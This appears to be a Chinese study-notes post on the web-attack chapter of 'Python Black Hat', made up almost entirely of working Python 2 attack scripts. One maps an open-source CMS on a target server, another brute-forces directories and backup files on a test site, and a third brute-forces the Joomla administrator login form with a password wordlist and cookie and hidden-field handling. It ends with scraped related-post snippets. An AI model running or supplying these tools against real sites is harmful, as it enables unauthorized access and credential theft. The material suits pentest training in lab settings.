开源Web应用目录扫描器

这里的前提是Web服务器使用的是开源CMS来建站的,而且自己也下载了一套相应的开源代码,感觉意义并不大

#!/usr/bin/python

#coding=utf-8

import Queue

import threading

import os

import urllib2

threads = 10

target = "http://10.10.10.144/dunling"

directory = "/dunling"

filters = [".jpg",".gif",".png",".css"]

os.chdir(directory)

web_paths = Queue.Queue()

for r,d,f in os.walk("."):

    for files in f:

        remote_path = "%s/%s"%(r,files)

        if remote_path.startswith("."):

            remote_path = remote_path[1:]

        if os.path.splitext(files)[1] not in filters:

            web_paths.put(remote_path)

def test_remote():

    while not web_paths.empty():

        path = web_paths.get()

        url = "%s%s"%(target,path)

        request = urllib2.Request(url)

        try:

            response = urllib2.urlopen(request)

            content = response.read()

            print "[%d] => %s"%(response.code,path)

            response.close()

        except urllib2.HTTPError as error:

            # print "Failed %s"%error.code

            pass

for i in range(threads):

    print "Spawning thread : %d"%i

    t = threading.Thread(target=test_remote)

    t.start()

暴力破解目录和文件位置

#!/usr/bin/python

#coding=utf-8

import urllib2

import threading

import Queue

import urllib

threads = 50

target_url = "http://testphp.vulnweb.com"

wordlist_file = "/tmp/all.txt" # from SVNDigger

resume = None

user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

def build_wordlist(wordlist_file):

    #读入字典文件

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

def dir_bruter(word_queue,extensions=None):

    while not word_queue.empty():

        attempt = word_queue.get()

        attempt_list = []

        #检测是否有文件扩展名,若没有则就是要暴力破解的路径

        if "." not in attempt:

            attempt_list.append("/%s/"%attempt)

        else:

            attempt_list.append("/%s"%attempt)

        #如果我们想暴破扩展

        if extensions:

            for extension in extensions:

                attempt_list.append("/%s%s"%(attempt,extension))

        #迭代我们要尝试的文件列表

        for brute in attempt_list:

            url = "%s%s"%(target_url,urllib.quote(brute))

            try:

                headers = {}

                headers["User-Agent"] = user_agent

                r = urllib2.Request(url,headers=headers)

                response = urllib2.urlopen(r)

                if len(response.read()):

                    print "[%d] => %s"%(response.code,url)

            except urllib2.URLError, e:

                if hasattr(e,'code') and e.code != 404:

                    print "!!! %d => %s"%(e.code,url)

                pass

word_queue = build_wordlist(wordlist_file)

extensions = [".php",".bak",".orig",".inc"]

for i in range(threads):

    t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))

    t.start()

暴力破解HTML表格认证

1、检索登录页面,接受所有返回的cookies值;

2、从HTML中获取所有表单元素;

3、在你的字典中设置需要猜测的用户名和密码;

4、发送HTTP POST数据包到登录处理脚本,数据包含所有的HTML表单文件和存储的cookies值;

5、测试是否能登录成功。

#!/usr/bin/python

#coding=utf-8

import urllib2

import urllib

import cookielib

import threading

import sys

import Queue

from HTMLParser import HTMLParser

#简要设置

user_thread = 10

username = "admin"

wordlist_file = "/tmp/passwd.txt"

resume = None

#特定目标设置

target_url = "http://10.10.10.144/Joomla/administrator/index.php"

target_post = "http://10.10.10.144/Joomla/administrator/index.php"

username_field = "username"

password_field = "passwd"

success_check = "Administration - Control Panel"

class Bruter(object):

    """docstring for Bruter"""

    def __init__(self, username, words):

        self.username = username

        self.password_q = words

        self.found = False

        print "Finished setting up for: %s"%username

    def run_bruteforce(self):

        for i in range(user_thread):

            t = threading.Thread(target=self.web_bruter)

            t.start()

    def web_bruter(self):

        while not self.password_q.empty() and not self.found:

            brute = self.password_q.get().rstrip()

            jar = cookielib.FileCookieJar("cookies")

            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)

            page = response.read()

            print "Trying: %s : %s (%d left)"%(self.username,brute,self.password_q.qsize())

            #解析隐藏区域

            parser = BruteParser()

            parser.feed(page)

            post_tags = parser.tag_results

            #添加我们的用户名和密码区域

            post_tags[username_field] = self.username

            post_tags[password_field] = brute

            login_data = urllib.urlencode(post_tags)

            login_response = opener.open(target_post,login_data)

            login_result = login_response.read()

            if success_check in login_result:

                self.found = True

                print "[*] Bruteforce successful. "

                print "[*] Username: %s"%self.username

                print "[*] Password: %s"%brute

                print "[*] Waiting for other threads to exit ... "

class BruteParser(HTMLParser):

    """docstring for BruteParser"""

    def __init__(self):

        HTMLParser.__init__(self)

        self.tag_results = {}

    def handle_starttag(self,tag,attrs):

        if tag == "input":

            tag_name = None

            tag_value = None

            for name,value in attrs:

                if name == "name":

                    tag_name = value

                if name == "value":

                    tag_value = value

                if tag_name is not None:

                    self.tag_results[tag_name] = value

def build_wordlist(wordlist_file):

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

words = build_wordlist(wordlist_file)

brute_obj = Bruter(username,words)

brute_obj.run_bruteforce()

《Python黑帽子:黑客与渗透测试编程之道》 Web攻击的更多相关文章

  1. python黑帽子-黑客与渗透测试编程之道(源代码)

    链接: https://pan.baidu.com/s/1i5BnB5V   密码: ak9t

  2. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  3. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  4. 《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理

    下载jython,在Burpsuite的扩展中配置jython路径: Burp模糊测试: #!/usr/bin/python #coding=utf-8 # 导入三个类,其中IBurpExtender ...

  5. 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

    窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...

  6. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

  7. 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器

    基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...

  8. 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能

    有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...

  9. 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制

    GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...

随机推荐

  1. Ubuntu 网卡多个 IP 地址

    临时添加 IP 地址 首先,让我们找到网卡的 IP 地址.在我的 Ubuntu 15.10 服务器版中,我只使用了一个网卡. 运行下面的命令找到 IP 地址: 复制代码 代码如下: sudo ip a ...

  2. 电商类Web原型制作分享-IKEA

    IKEA是一个家居整合大型零售商,属于电商类官网.电商以展示商品.售后服务.购物流程为主.根据网站的图文方式排版,主导航栏使用的标签组,区域导航栏使用的是垂直选项卡,实现下拉弹出面板交互的功能. 本原 ...

  3. 继续修改爬虫百度贴吧,这次随意贴吧的任何一个index页都行,然后自动d盘生成tupian文件夹来保存

    from urllib.request import urlopenfrom bs4 import BeautifulSoupfrom urllib.request import urlopenimp ...

  4. $.fn.extend 和$.extend函数

    区别和详解:jQuery extend()和jQuery.fn.extend()     首先是简单的概述区别:$.extend()是类方法   $.fn.extend()是原型方法   对象方法和原 ...

  5. android 网站上下的 adt 不能显示没有安装的

    问题描述 使用SDK Manager更新时出现问题Failed to fetch URL https://dl-ssl.google.com/android/repository/repository ...

  6. linux的零碎知识

    一  nfs服务器 1  NFS的介绍:是Network File System的简写,是网络文件系统.用于分散式文件系统的协定,由sun公司开发的,在1984年向外公布的. 2  NFS的功能:是通 ...

  7. "我们分手吧。"女的对男的说。 "为什么呢?亲爱的,你不要我了么?" "因为你幼稚。"女的坚定地语气回答道,然后转身准备走。 男的上前踩住女的影子,然后说...

    1."我们分手吧."女的对男的说. "为什么呢?亲爱的,你不要我了么?" "因为你幼稚."女的坚定地语气回答道,然后转身准备走. 男的上前踩 ...

  8. 2018.09.14 bzoj2982: combination(Lucas定理)

    传送门 貌似就是lucas的板子题啊. 练一练手感觉挺舒服的^_^ 代码: #include<bits/stdc++.h> #define mod 10007 #define ll lon ...

  9. 2018.07.22 codeforces750E(线段树维护状态转移)

    传送门 给出一个数字字串,给出若干个询问,询问在字串的一段区间保证出现2017" role="presentation" style="position: re ...

  10. c++ 内联函数 (讲解的TM真好)

    1.  内联函数 在C++中我们通常定义以下函数来求两个整数的最大值: 复制代码 代码如下: int max(int a, int b) {  return a > b ? a : b; } 为 ...